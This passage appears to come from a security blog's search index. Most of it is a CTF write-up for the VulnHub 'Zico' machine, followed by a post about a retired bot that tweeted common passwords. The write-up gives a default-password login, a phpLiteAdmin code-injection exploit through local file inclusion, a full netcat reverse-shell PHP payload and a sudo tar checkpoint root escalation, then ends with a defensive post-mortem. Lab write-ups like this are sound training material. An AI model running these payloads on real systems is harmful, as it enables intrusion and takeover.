'http://192.168.56.101' -e php,html,js,txt,sh --simple-report=dirsearch_quick\nWe find a lot of interesting filenames, especially the dbadmin directory. Anything with \u0026ldquo;admin\u0026rdquo; in the title may be worth a look. Finally, we\u0026rsquo;ll let fimap see if we can dig anywhere we aren\u0026rsquo;t supposed to be able to.\nfimap -H -d 3 -u \u0026quot;http://192.168.56.101\u0026quot; -w /tmp/fimap_output | tee fimap_result\nhttp://hostname/view.php?page=tools.html smells like file inclusion.\nThe use of ?page= may allow us to directly view arbitrary files on the webserver. Instead of using tools.html as an argument, we just insert a file\u0026rsquo;s full path.\nI tried something like ../../../../etc/passwd, but didn\u0026rsquo;t find success. Maybe we can use this later.\nLastly, we peruse the site in the browser.\nZico\u0026rsquo;s Shop?\nZico doesn\u0026rsquo;t seem confident that he is in control of his own site. Let\u0026rsquo;s prove that he is right to have doubts and go right for that /dbadmin page.\nWhat have we here?\n2. Doing Dirty Deeds in da Database # A php database page, with an obvious version number. The title of \u0026ldquo;testdb\u0026rdquo; hints at a default setup. A default setup may use a default password.\npassword: admin\nWe\u0026rsquo;re inside. Those look like password hashes to me. Our friend Hashbuster should have a look at them.\nNot too shabby! Root and user passwords. I don\u0026rsquo;t think this db is actually used for anything other than testing, but there is a chance that the same passwords are used to login with SSH.\nNope. We can see some other useful information on the database page, however.\nFor one, we are given the test_user database\u0026rsquo;s full file path.\nThis information, combined with the Local File Inclusion vulnerability we spotted earlier means we can access these databases by visiting a URL.\nWe can try some tricks using SQL commands, but I wonder if these waters have been charted before\u0026hellip;\nfindsploit phpliteadmin\nThe very first hit matches our phpLiteAdmin version number.\nIf you run searchsploit -x 24044, you\u0026rsquo;ll see a document explaining how the exploit is operated. We\u0026rsquo;ll break it down, step by step.\nCreate a new database with a name ending in \u0026quot;.php\u0026quot; Select this new database and create a new table with one field. Set the field to the \u0026ldquo;Text\u0026rdquo; type, and enter a php-command payload as the Default Value. I decided to use my most reliable netcat-based reverse-shell.\n\u0026lt;?php passthru(\u0026quot;rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2\u0026gt;\u0026amp;1|nc local.machine.ip.addr PORTNUM \u0026gt; /tmp/f\u0026quot;); ?\u0026gt;\nCreate the table, and set up the listener on your local machine. nc -lnvp PORTNUM\nVisiting the database in the browser, using our handy-dandy LFI vulnerability will run the payload and pop our shell. http://192.168.56.101/view.php?page=../../../../usr/databases/a.php\n3. From www-data to User # This shell could use some improvement, so let\u0026rsquo;s see if we can\u0026rsquo;t spawn a bash shell with a tty using python.\nwhich python which bash python -c 'import pty;pty.spawn(\u0026quot;/bin/bash\u0026quot;)'\nMy \u0026ldquo;advanced\u0026rdquo; powers of deduction tell me that we are going to have a user named zico. A user with a home directory, even.\nLet\u0026rsquo;s verify.\nls -la /home ls -la /home/zico\nLuckily for us, Zico doesn\u0026rsquo;t seem to mind if we read files in his home directory. Talk about courteous!\nZico seems to have even left a note behind for himself. Surely he won\u0026rsquo;t mind if we read that, too.\ncd /home/zico cat to_do.txt\nZico seems to be trying out some content management systems for a new website. The site we got through in order to get this shell used phpliteadmin, so Wordpress must be next.\nWe see Wordpress sites all the time in CTFs, and know it well enough to know where to look for the squishy bits.\ncd wordpress ls -l\nZico hasn\u0026rsquo;t implemented this site yet, so it may not have been combed through for sensitive info. wp-config.php can often contain passwords.\ngrep -i 'pass' wp-config.php\nA database password, nice. Let\u0026rsquo;s try it with SSH, because, why not?\n4. From Zico to Root # As the presumed owner of this box, Zico should be able to get some significant things done.\nsudo -l\ntar and zip are a bit strange to see as sudo-enabled commands. Can they be used for code execution?\nI searched online, and found some very interesting information at these two sites.\ntar can be run with flags that cause it to unarchive with \u0026ldquo;checkpoints.\u0026rdquo; At these points, the process will pause and take an action, then seamlessly resume.\nSince we can run tar as root, we just need to use these checkpoints to run some commands that escalate our privileges.\nRunning Tar As Root For Fun and Profit # Move to a \u0026ldquo;temporary\u0026rdquo; folder like /dev/shm and create a file that we will compress.\nCompress it with tar as Zico. No need to run as root just yet.\nUnarchive the newly created .tar, making sure to use sudo and including the flags to add a checkpoint and commands.\nThe commands will run along with the .tar command, so any output from the commands will appear in the terminal\nOur test payload is the (redundant) command echo $(id), which will output the info belonging to the user who ran the tar command to the terminal.\nIf things go according to plan, we should see root\u0026rsquo;s info.\nsudo tar -xf archive.tar --checkpoint=1 --checkpoint-action=exec='echo $(id)' Our privesc concept is proven. We can just run /bin/bash as our checkpoint commands to spawn a root shell.\nsudo tar -xf archive.tar --checkpoint=1 --checkpoint-action=exec='/bin/bash'\nAnd, we\u0026rsquo;re root.\nGo to the /root directory and grab the flag.\ncd /root ls cat flag.txt\nPost-Mortem # This CTF was made purposefully made porous, but these vulnerabilities can be found in the real world.\nHere\u0026rsquo;s what made Zico rootable.\nUse of Default/Obvious Credentials\nIn this scenario, Zico\u0026rsquo;s phpLiteAdmin database was just for testing purposes. However, admin is simply not a password that should be in use. It\u0026rsquo;s just too easy to guess. Had we not been able to gain access to the phpLiteAdmin panel, we may not have gotten any access at all. Local File Inclusion\nServing webpages with ?page= is a recipe for local file inclusion. Only one page was intended to reached this way, and it wasn\u0026rsquo;t even the only link to this page on the site. Outdated Versions of 3rd Party Software\nThe phpLiteAdmin version used here isn\u0026rsquo;t even available for download from the phpLiteAdmin website. The code injection vulnerability we used to run our php payload was patched away in later versions. Credential Reuse\nThe password by www-data in the wp-config.php file to access the website database was the same as the user\u0026rsquo;s password. Least Privilege Violations\nwww-data had unneccessary read access to zico\u0026rsquo;s home folder. If zico isn\u0026rsquo;t a superuser, I\u0026rsquo;m not sure what reason they would need to have to run tar and zip as root. Thanks for reading! # ","date":"12 March 2017","externalUrl":null,"permalink":"/archive/ctf-writeups/zico-vulnhub/","section":"Archive","summary":"","title":"CTF Writeup: Zico on VulnHub","type":"archive"},{"content":" Retired This bot is no longer operational. Keeping this post for posterity.\nIf the bot tweets one of your passwords, change it. # This is not the moment to say \u0026ldquo;haha, that is so me!\u0026rdquo; and like the tweet.\nYou are at an increased security risk.\nOverview # With the release of ProbableWordlists V2, we have a more accurate evidence-based list of the world\u0026rsquo;s most common passwords. The aim of the Probable-Wordlists project is to discourage the use of common passwords.\nBut, how do we know what passwords look like? Aren\u0026rsquo;t they supposed to be secret? If you are never supposed to tell me your passwords, and I am never going to tell you mine, how do we know we aren\u0026rsquo;t using the same passwords? How do we know we aren\u0026rsquo;t using the same password as millions of other people? We need to be warned what passwords are too risky to use.\n@WorstPasswords is a Twitter bot designed to do just this. Twice a day, it tweets a password from the list of the Top 747 Most Common Passwords. If someone witnesses the bot announcing their \u0026ldquo;secret\u0026rdquo; password, they may be driven to changing it to something far more secure. Hopefully, the bot will inspire them to take the first step towards a more security-minded internet presence.\nOperation # It\u0026rsquo;s really a simple bot, here is the entire workflow.\nIs it time to post? Okay, pick a wordlist to read from. Pick a random line from that list. Tweet a post based on that line. Wait until the next time to post. It is incapable of querying any online lists or responding to mentions or direct messages. All it can do is tell time, pick numbers, and tweet.\nStatistically, the top 25 passwords on the list are far, far more common than the bottom 747. However, a bot that only posts 25 passwords isn\u0026rsquo;t very useful. I tried to strike a balance between tweeting the the top 25 and the bottom 722 passwords on the bot\u0026rsquo;s list.\nI accomplished this by including a \u0026ldquo;coin flip\u0026rdquo; concept, albeit using a very weighted coin.\n20% of the time, the bot picks from the list of the Top 25 entries 80% of the time, the bot picks from the Bottom 722 entries. This way, the bot pulls from a large enough pool of possibilities to have variety, but the passwords that are the most common are weighted to appear more often than those that don\u0026rsquo;t.\n747 Is A Weird Number. Why not 750? # The concept of \u0026ldquo;the Nth most common password\u0026rdquo; is fuzzy - there are ties. Some passwords are equally common. This is why the tweets don\u0026rsquo;t say \u0026ldquo;this is the world\u0026rsquo;s Nth most popular password.\u0026rdquo;\nIf you are perusing the Probable Wordlists and suddenly see a section in obvious alphabetical order, you are seeing passwords that are all equally likely.\nHowever, instead of tweeting out every single password from say, the 15th most common slot, the bot simply chooses one from the top 747 entries on the list.\nEach one of the passwords in the bot\u0026rsquo;s pool appeared at least 206 times in Probable Wordlist V2 analysis. This is unrelated to the fact that the smallest Probable-Wordlist is 207 lines long. But it is just a funny coincidence.\nPassword Reuse Warning # Using a common password is risky, but it is even more common to re-use passwords across accounts. I am very careful to say \u0026ldquo;one of your passwords\u0026rdquo; as opposed to \u0026ldquo;your password\u0026rdquo; for exactly this reason. Do not reuse passwords across accounts.\nDo not reuse passwords across accounts.\nUnique passwords can mean the difference between someone listening to music on your Spotify and writing emails in your name, gaining access to your bank account and posing as you to ask your Facebook friends for money.\nThis warning is possibly more important than awareness of the most common passwords - I had to include it.\nRetired This bot is no longer operational. Keeping this post for posterity.\nFollow @WorstPasswords to help remember the most common passwords on the planet! Thanks for reading!\n","date":"17 February 2017","externalUrl":null,"permalink":"/blog/worstpasswords/","section":"Blogs","summary":"A (now retired) automated Twitter bot that tweeted the worst passwords found in the Probable Wordlists V2.","title":"(RETIRED) WorstPasswords Twitter Bot","type":"blog"},{"content":"","externalUrl":null,"permalink":"/authors/","section":"Authors","summary":"","title":"Authors","type":"authors"},{"content":"","externalUrl":null,"permalink":"/categories/","section":"Categories","summary":"","title":"Categories","type":"categories"}]